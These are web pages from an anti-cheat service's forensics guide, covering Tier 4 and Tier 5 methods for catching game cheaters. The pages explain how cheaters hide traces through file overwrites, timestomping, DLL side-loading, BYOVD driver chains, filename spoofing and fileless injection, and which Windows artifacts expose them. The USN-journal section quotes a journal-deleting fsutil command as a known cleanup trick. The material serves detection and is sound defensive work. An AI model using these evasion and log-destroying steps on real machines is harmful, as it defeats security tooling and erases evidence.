tools ### Virtual Machine / Hypervisor Forensics Some advanced cheaters run the GAME inside a VM and the cheats on the host (or vice versa). Hypervisor-level cheats use Hyper-V, KVM, or custom hypervisors to inspect/modify game memory from a layer beneath the OS. Anti-cheats can sometimes detect VMs but cheaters mask hypervisor presence. Forensic detection looks for VM artifacts the user couldn't fully hide. 3 tools1 command ### Anti-Cheat Specific Bypass Artifacts FiveM uses CitizenFX anti-cheat. GTA Online uses BattlEye + R\*'s own checks. Each anti-cheat leaves logs, has known bypass methods, and cheats targeting them leave specific traces. HWID spoofers, volume serial spoofers, registry cleaners targeting CitizenFX paths, process renamers all leave forensic traces. 3 locations1 command ### Game File Integrity Validation File replacement is one of the simplest cheat methods — swap a legit game DLL with a modified one. Detection requires comparing user's game files against verified-clean baseline hashes and inspecting modification timestamps. 5 tools1 command The Golden Rule — Tier 4 At Tier 4, we don't catch cheaters. We build cases that survive scrutiny. Every byte preserved. Every hash verified. Every step documented. Every conclusion peer reviewed. The evidence isn't what we say it is — it's what the data proves it is. Capture before you analyze. Analyze on copies, never originals. Hash before, hash during, hash after. Document every tool, every command, every finding. If a finding can't be reproduced from the evidence, it isn't a finding. If a verdict can't survive peer review, it isn't a verdict. At T1 we triage. At T2 we investigate. At T3 we confirm. At T4 we PROVE. [Previous\ \ Tier 3 · Elite forensic](https://clubhouseac.shop/research/pc-checking-methods/tier-3) [Next\ \ Tier 5 · Contradiction forensics](https://clubhouseac.shop/research/pc-checking-methods/tier-5) --- # Tier 5 — Overwrite Detection & Contradiction Forensics · Clubhouse AC Tier 5Where bypasses die · 25 methods Overwrite Detection & Contradiction Forensics ============================================= Most cheats can hide a file. Few can hide a CONTRADICTION. Tier 5 is the science of finding what disagrees, what survived deletion, and what evidence one bypass technique left behind that the user thought they cleaned. Three or more contradicting sources = forensic certainty. All25Overwrite & Replacement Detection5Prior-Artifact Contradictions5Timestamp Forensics2Side-Loading & Filename Tricks3Service & Driver Hijacking2Cleanup Contradictions4Fileless & Memory-Only2Full T5 Workflow2 T5 Overwrite & Replacement Detection --------------------------------- 5 ### File Overwrite Bypass Detection File overwrite bypass = swap a cheat .exe with the SAME NAME and SAME SIZE as a legit file (or write zeros over the cheat after use). Defeats name-based scanners and avoids creating new MFT entries. But it leaves traces in $UsnJrnl (every WRITE event), $LogFile (pending writes), $MFT (content-modified time), Prefetch (shows actual file content executed), and AmCache (SHA-1 of what RAN, not what's currently on disk). 3 tools1 command ### Empty-File Payload Write Detection A file is created as 0 bytes (or with placeholder content), then later written to with the cheat payload, executed, then truncated back to 0 bytes. The MFT entry exists the whole time but shows zero size during checks. Filesystem timestamps reveal the truth. 3 tools1 command ### Byte-Level File Replacement Detection Sophisticated cheats replace ONLY specific bytes inside a legitimate file (e.g., game DLL exports). The file size, signature header, and most content stay identical. Only the targeted bytes change. These bypass simple hash comparisons because the user can recompute the file size and even fake some PE checksums. 4 tools1 command ### Same-Name Executable Replacement Proofing Cheat is named exactly the same as a legitimate program ('explorer.exe', 'svchost.exe', 'FiveM.exe') and placed in a different directory. Process listings look normal — until you check FULL paths. 4 tools1 command ### Same-Size File Replacement Detection Cheats can be padded with NUL bytes or junk data to MATCH the size of a legitimate file. Defeats simple 'size differs' checks. Hash and content-based comparison is the only reliable defense. 4 tools T5 Prior-Artifact Contradictions ----------------------------- 5 ### Hash Mismatch Against Prior Artifacts Windows artifacts store hashes from earlier executions: AmCache.hve (SHA-1 of every executed file), AppCompat / ShimCache (file path + first execution), SRUM (application identity hashes), Volume Shadow Copies (historical file states). If on-disk file hash today doesn't match what these artifacts recorded — the file changed. 4 tools ### Prefetch Hash/Path Contradiction Checks Prefetch filenames are formatted as: NAME.EXE-\[PATH\_HASH\].pf. The hash portion is calculated from the EXE's full path. If a Prefetch file exists with hash X, but the file at that path produces hash Y when Prefetch is regenerated — the file has moved or been replaced. Also: Prefetch records every file/DLL the EXE loaded. If those referenced files no longer exist on disk, you have proof they did once. 2 tools1 command ### ShimCache Path Survival After Deletion ShimCache (AppCompatCache) is stored in the SYSTEM hive and ONLY updates on shutdown — meaning if a cheat ran, was deleted, and the system was rebooted normally, the cheat's path will be cached. ShimCache survives file deletion, Prefetch wipe (separate artifact), AmCache wipe (separate hive), and most cleaners. 3 tools1 command ### BAM + SRUM Ghost Entry Detection BAM (Background Activity Moderator) and SRUM (System Resource Usage Monitor) record program execution at the kernel level. Both are independent of file presence — entries persist even after the file is deleted. If BAM/SRUM has an entry but the file is gone — execution is proven. 3 tools1 command ### Windows Search Index Residue for Deleted Files Windows Search service maintains an index (Windows.db / Windows.edb) of files on the system. The index is updated on a delay — files deleted recently still have entries until the indexer catches up. Even after that, slack space in the index database holds historical data. 3 tools2 locations T5 Timestamp Forensics ------------------- 2 ### $SI vs $FN Timestomp Forensic Proof Every NTFS file has TWO sets of timestamps: $STANDARD\_INFORMATION ($SI) — what user-mode tools see and modify — and $FILE\_NAME ($FN) — kernel-only, only writable from kernel. User-mode timestomp tools modify $SI but cannot touch $FN. Comparing them reveals the manipulation. A timestomped file shows $SI Created BEFORE $FN Created (impossible — $FN is set when file is created, $SI gets modified later). 2 tools1 command ### File Birth Time vs Execution Time Mismatch A file's birth time ($FN Created) cannot be later than its execution time. If AmCache says it ran at T+0 but $FN says it was created at T+5 — the user replaced the file AFTER execution, then timestomped or modified it. 4 tools T5 Side-Loading & Filename Tricks ------------------------------ 3 ### DLL Side-Loading / Search-Order Hijack Proofing A malicious DLL with the same name as a legitimate system DLL is placed in the application's directory. Windows DLL search order finds the local malicious DLL first. The application then loads the cheat DLL thinking it's legitimate. 3 tools1 command ### Filename Spoofing Detection Five techniques: Double Extension ('screenshot.png.exe' — Windows hides .exe by default), Unicode RTLO Override ('songexe.mp3' but really 'song\[U+202E\]3pm.exe'), Homoglyph (Cyrillic 'а' instead of Latin 'a'), Extensionless (PE with no extension), Spoofed Extension (.txt or .jpg that's actually executable). 2 tools1 command ### File Attribute / ACL / Ownership Tampering Cheats often manipulate file attributes to hide: +Hidden +System (invisible in Explorer), Read-only (prevents AC quarantine), ACL changes (deny anti-cheat read access), Owner = SYSTEM (protect from user-mode tools). 3 tools1 command T5 Service & Driver Hijacking -------------------------- 2 ### Service Binary Path Replacement A legitimate Windows service has its ImagePath swapped to a cheat .exe. When the service starts, it runs the cheat with SYSTEM privileges. Then the path is restored before the system reboots. Detection: compare service executable paths/hashes to known-good baselines AND watch event logs for service modifications. 3 tools1 command ### Vulnerable-Driver Drop and Cleanup Chain BYOVD attack flow: drop signed-vulnerable driver → register service → start service → exploit → stop service → DeleteService → delete .sys → reboot. Each step leaves traces. Surviving evidence: DriverStore cache, Event ID 7045, registry transaction logs, AmCache .sys entries, $UsnJrnl drop-execute-delete pattern, setupapi.dev.log first-install records. Cross-reference all .sys hashes against LOLDrivers — if matched, BYOVD confirmed. 6 tools1 command T5 Cleanup Contradictions ---------------------- 4 ### Prefetch Wipe Contradiction Analysis The user wiped Prefetch — but every other artifact remembers programs that ran. Each surviving artifact is now PROOF Prefetch was deliberately wiped. 4 tools1 command ### Event Log Clearing Contradiction Clearing event logs leaves Event 104 (System) or Event 1102 (Security) — the act of clearing is itself logged. But savvy users IMMEDIATELY clear AGAIN. Contradictions: logs go from boot → silence → today, channel ID gaps (EventRecordIDs jump), ETW providers active but no events, other logs reference events that don't exist. 4 tools1 command ### $UsnJrnl Reset / Rollover Contradiction The USN Journal is per-volume, fixed-size, and constantly written to. It rolls over (oldest entries dropped) but never gets reset to ZERO — except when: drive is reformatted, user runs fsutil usn deletejournal /N C:, or specialized cheat cleaners reset it. A fresh-looking USN Journal on a drive in use for years is a major red flag. 3 tools1 command ### Shadow Copy Deletion / Tamper Review Volume Shadow Copies preserve historical file system states. A user wiping cheat traces will often delete shadow copies because they expose what was there before. Detecting shadow tampering = detecting a deliberate cleanup attempt. 4 tools1 command T5 Fileless & Memory-Only ---------------------- 2 ### Fileless Loader Detection A loader reads a payload from a remote URL or registry value, decodes it, allocates memory, and executes it WITHOUT writing to disk. No PE on disk = no AmCache, no Prefetch, no $MFT entry for the payload. But the loader itself must run. Or PowerShell. Or a registry value must exist. 5 tools ### Memory-Only Injected Payload Detection Three top-tier injection methods leave memory signatures even when nothing's on disk: Process Hollowing, Reflective DLL Injection, Manual Mapping. Unified detection via PE-Sieve scans process memory and identifies hollowed/replaced module images, modules without disk backing (manual map), DLLs not in PEB loader (reflective), hooked code, shellcode in private memory. 5 tools1 command T5 Full T5 Workflow ---------------- 2 ### Full Contradiction Matrix At the end of a Tier 5 investigation, systematically score every cheat indicator against all available artifact sources — execution records, file existence traces, hash sources, and timestamps — to build a contradiction count. Each source that disagrees with another multiplies the evidentiary weight: a single artifact can be dismissed, but three independent sources contradicting each other constitute forensic certainty that something was hidden and cleaned. ### Contradiction Scenarios Catalogue Tier 5 produces six named contradiction patterns, each representing a specific class of bypass attempt that left behind more evidence than the user intended to erase. Use this catalogue as a checklist during a PC check: match the artifacts you have found to the scenario that best fits, then document which independent sources corroborate it to build a defensible conclusion. The Golden Rule — Tier 5 You can't bypass everything. For every artifact a user wipes, two more remember. For every file replaced, a hash survives. For every timestamp faked, the kernel kept the truth. For every log cleared, the act of clearing was logged. For every cheat deleted, three artifacts confirm it ran. The bypass IS the evidence. The cleanup IS the trace. The contradiction IS the proof. A clean system has consistency. A cheated system has lies that contradict each other. Find the lie. Find the cheat. [Previous\ \ Tier 4 · Full acquisition](https://clubhouseac.shop/research/pc-checking-methods/tier-4) ---